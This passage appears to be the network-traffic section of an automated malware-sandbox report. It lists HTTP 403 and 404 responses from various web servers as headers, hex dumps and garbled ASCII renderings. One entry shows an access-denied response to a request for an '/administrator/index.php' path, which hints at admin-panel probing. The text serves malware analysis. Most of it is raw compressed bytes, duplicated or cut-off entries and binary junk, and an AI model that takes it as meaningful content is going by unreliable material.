1242;nH#$\v''dH%:$am=>f}")JcM*oU,|w__wsS20&5_i8=X=S!519=E`n6<Wnjau;ILHgPY;yQY>Zx(Y(gBiq:UsJ6Oo<+BCFtO&!:Qs8lz^I$qD#-$f-/JZ6)IlC!")S/J!|fWtN@:Gfm4oR!Ln7%Oi(^J3e/|woYCJ\ |+bVNM@=|=H{vo|
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 290Expires: Mon, 05 Feb 2024 11:14:50 GMTDate: Mon, 05 Feb 2024 11:14:50 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131690957_1611129006_213759812_14_9815_102_0_-";dur=1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 36 39 30 26 23 34 36 3b 63 62 64 62 37 34 34 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;administrator&#47;index&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131690&#46;cbdb744</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Encoding: gzipContent-Type: text/htmlDate: Mon, 05 Feb 2024 11:14:50 GMTEtag: W/"61128294-3feb"Logid: 8900799505880304556P3p: CP=" OTI DSP COR IVA OUR IND COM "Server: nginxSet-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;Set-Cookie: BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1; expires=Tue, 04-Feb-25 11:14:50 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1Vary: Accept-EncodingVary: Accept-EncodingX-Powered-By: BaiduCloudYld: 8900799505880304556Yme: ZIGW/y8rX0QMaTYYTmvhrm5XvfwASwfzoAJPwiY=Transfer-Encoding: chunkedData Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cachex-imvu-rnd: QVzQdd5i06Z7LhzBcontent-language: pt-brContent-Encoding: gzipData Raw: 31 32 34 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 5c 76 12 27 1b 27 99 1e 64 03 a3 48 16 25 3a 24 8b 61 15 6d b9 3d f9 98 c1 3e 0c 66 81 7d 1a ec cb be fa c7 f6 9c 22 29 91 12 95 d8 dd 4a 63 4d c8 2a d7 e5 dc 6f 55 2c 1f 7c 77 f2 f2 f8 cd 5f 5f 9d 92 99 0c fc f1 c1 77 ba fe de 73 c9 b3 53 32 f8 30 26 f9 cf 01 0e 12 c7 8b 0f 35 5f c6 1a f1 69 38 3d d4 58 a8 bf 3d d7 88 ed 53 21 0e 35 8f 0d b4 31 39 f8 ee 3d 0b 1d cf fd a0 eb 45 60 c3 07 03 1b 6e 00 36 95 19 3c ec 18 57 c3 8a a4 6e c5 6a bd ae 17 61 ec 1c cc 18 75 c6 3b 8a 8a 80 49 0a 4c cb 48 67 9f 12 ef ea 50 fb 59 7f 3b d1 8f 79 10 51 e9 59 3e 03 5a 78 28 59 28 0f b5 67 a7 87 cc 99 42 8f b1 69 ed 71 3a 55 7f 73 13 15 17 4a 36 97 06 92 b8 4f ec 19 8d 05 93 87 6f df 3c d6 07 2b 90 42 1a b0 43 8d 46 91 cf 74 4f 26 21 13 3a fc 51 80 03 7f e9 9e 73 38 6c 0f f7 7a bb 83 5e af 49 b0 87 c6 d3 24 c0 71 a4 44 8c 0c 23 92 2d c1 ec 24 66 2d 2f b8 4a 5a 36 0f 8c 10 29 f8 93 e0 49 6c b3 43 8b 86 21 8b 15 f2 22 e2 29 e7 53 c0 1c f9 f4 a6 1a 2f 00 4a 21 06 dc f2 7c 66 f3 d8 e1 57 74 0d 4e ca 40 3a 47 bf 66 16 02 d3 6d 1a d1 b2 34 6f 98 b8 df 52 21 a9 4c 84 6e d1 18 9a 37 25 18 96 4f ed 8f ba 8c 69 28 fc c4 86 ae ff 87 c4 f8 5e f8 91 c4 cc cf 01 4a 9e d8 33 dd 83 65 1a 11 de 2f 0c cc 7c 77 6f be bb a7 91 59 cc dc 43 0d b5 08 4a 5c d5 20 7c 02 1e 1a d7 9e 9c 05 cc f0 82 a9 e1 d2 2b 84 62 ac 82 d5 15 b8 56 14 4e ef 4d 40 df 9c f7 cd ed 11 a0 c0 3d 88 80 bd ce 7c af b3 3d 02 14 b8 87 11 d0 9f ef f5 b7 48 00 82 7b 10 01 ed 76 6f 0e 9f ed 91 90 01 7c 18 11 1d 73 0e 9f 2d 12 91 02 7c 18 11 3d 20 bc b7 4d 49 a4 00 1f 46 c4 6e 67 0e 9f 2d 12 91 02 7c 18 11 03 90 de 60 9b ea 48 01 56 11 91 22 96 90 b8 a0 1d d0 29 33 d4 a4 5f 89 39 fb d6 bb 9d 79 37 e3 39 e3 49 f5 fc 3e c8 db 43 d0 fb b0 57 42 9f f5 fd 3e 04 0c fb f3 61 bf 84 5e f5 7c 5b e4 34 74 62 ee 39 ba 3d 8b 79 c0 40 08 60 77 c3 ce 8a 10 54 df ef a4 85 fe bc 5d 16 82 ea 59 45 1e d0 d0 73 99 90 bf 1a 5f 0e a0 75 29 90 8d 32 74 31 e3 b1 b4 13 49 52 1e 7f 1b 4b 2d f8 95 22 50 25 c0 d8 f8 09 cb 2b dd 16 02 cb 83 58 fe 64 3c 12 01 7c a7 75 d6 2d 56 7f 3a f5 bd 69 38 f2 99 2b f7 23 2e 3c e9 f1 70 44 2d c1 fd 44 b2 7d ec 1e 99 fb 92 47 23 7d d0 89 e6 fb 16 94 56 2c d6 2d 2e 25 0f 46 ed 68 4e 60 a6 e7 90 47 6c 80 cf fe b5 e7 c8 d9 a8 6d 9a 3f ec cf 98 37 9d c9 d1 de 00 96 b9 50 8a e8 2e 0d 3c ff 66 54 7b ca fc 2b 26 3d 9b 92 33 96 b0 5a 53 40 5d a2 0b 16 7b ee be 05 85 ca 34 e6 49 e8 8c b0 b0 f9 e8 49 1d 44 c5 a0 a6 99 c6 d4 f1 a0 74 a9 03 2d Data Ascii: 12
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Encoding: gzipContent-Type: text/htmlDate: Mon, 05 Feb 2024 11:14:50 GMTEtag: W/"61128294-3feb"Logid: 8900799505880304556P3p: CP=" OTI DSP COR IVA OUR IND COM "Server: nginxSet-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;Set-Cookie: BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1; expires=Tue, 04-Feb-25 11:14:50 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1Vary: Accept-EncodingVary: Accept-EncodingX-Powered-By: BaiduCloudYld: 8900799505880304556Yme: ZIGW/y8rX0QMaTYYTmvhrm5XvfwASwfzoAJPwiY=Transfer-Encoding: chunkedData Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kUQx2bPKD6Q8B4mYJoXNgGMvD%2BUbPboVXzm3qK2TBYFIUSGoPxAn5ItW7xWZ7V2E98vveF%2FVqnmdSwHs2ftsFer1TrJAPLP8tJyP3LESiunzVp%2BSrBzR1ZT4CRmCnjyI9p%2BxDNgO04YG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb6eab8c0725-ATLContent-Encoding: gzipData Raw: 36 63 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 b8 11 fd df 9f 62 a2 02 89 0d 58 92 bd b7 7b 49 1d 59 c5 75 37 05 02 6c 71 db db 2c da c5 61 11 50 e4 c8 e2 85 22 75 24 65 c5 48 f3 dd 0b 8a 92 2d ff 48 ae 8b 16 08 10 51 1c be 99 79 7c 33 22 9d 9c 7d f8 f9 fd dd d7 4f 37 50 d8 52 a4 a3 e4 2c 0c 7f e5 39 08 0b b7 37 70 f9 2d 85 c4 4d 00 15 c4 98 65 20 55 f8 9b 01 8e 3f 82 12 8c 63 00 82 c8 d5 32 40 19 7e f9 1c a4 90 9c fd 8a 92 f1 fc 5b 18 ee a0 3a 1c 80 d3 50 97 df 07 75 f5 0a d4 d5 77 40 ad 6c 87 e6 5e 9c ca f2 18 25 0c f7 91 0a 24 2c 1d 25 96 5b 81 e9 4f d6 a2 b4 5c 49 f8 05 7f af b9 46 76 06 ff 86 f7 42 d5 2c 17 44 63 12 7b bb 51 52 a2 25 40 0b a2 0d da 65 f0 e5 ee 6f e1 55 00 71 3f 51 58 5b 85 0e 61 bd 0c de 2b e9 40 c3 bb 4d 85 01 50 3f 5a 06 16 1f 6d ec e2 bd de c2 bc 86 f2 af f0 cb 4f e1 7b 55 56 c4 f2 4c 0c 81 6e 6f 96 37 6c 85 83 75 92 94 b8 0c b4 ca 94 35 03 43 a9 b8 64 f8 38 05 a9 72 25 84 6a 8e 96 ac 39 36 95 d2 76 b0 a8 e1 cc 16 4b 86 6b 4e 31 6c 07 53 2e b9 e5 44 84 86 12 81 cb b9 47 11 5c 3e 80 46 b1 0c 8c dd 08 34 05 a2 0d 80 b3 65 40 f3 7b ff 2a a4 c6 04 50 68 cc 97 41 4c 99 0c e9 8a c7 7e 2a a6 79 84 5a 2b 6d a2 d6 28 3e d4 f0 9f bf a5 2f bb b8 d8 b9 e0 e8 bc 5c fc a1 17 8e bd a3 7d 35 b4 86 69 a6 d8 e6 a9 24 7a c5 e5 62 76 5d 11 c6 b8 5c 2d 66 cf 89 07 4a 47 a3 81 02 d1 c5 37 9f 75 1a 1c 25 86 6a 5e d9 74 04 c0 73 18 9f 49 b2 e6 2b 62 95 8e a8 52 0f 1c 6f 24 c9 04 b2 09 3c 8d 5c 09 34 5c 32 d5 44 84 b1 9b 35 4a fb 91 1b 8b 12 f5 f8 e2 c3 cf 7f ef 94 f3 51 11 86 ec 62 0a 79 2d 69 2b ce 71 bf 1a 60 4d 34 74 c0 02 96 c0 14 ad 4b 94 36 5a a1 bd 11 e8 1e ff ba b9 65 e3 0b 6f 13 12 81 da 5e 4c ae bb d5 fd ca a8 cd 2b 62 dc 54 82 6c 60 09 17 99 50 f4 e1 c2 db 3d 4f 46 00 cf Data Ascii: 6c7XobX{IYu7lq,aP"u$eH-HQy|3"}O7PR,97p-Me U?c2@~[:Puw@l^%$,%[O\IFvB,Dc{QR%@eoUq?QX[a+@MP?ZmO{UVLno7lu5Cd8r%j96vKkN1lS.DG\>F4e@{*PhAL~*yZ+m(>/\}5i$zbv]\-fJG7u%j^tsI+bRo$<\4\2D5JQby-i+q`M4tK6Zeo
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:14:51 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 05 Feb 2024 11:14:07 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:52 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 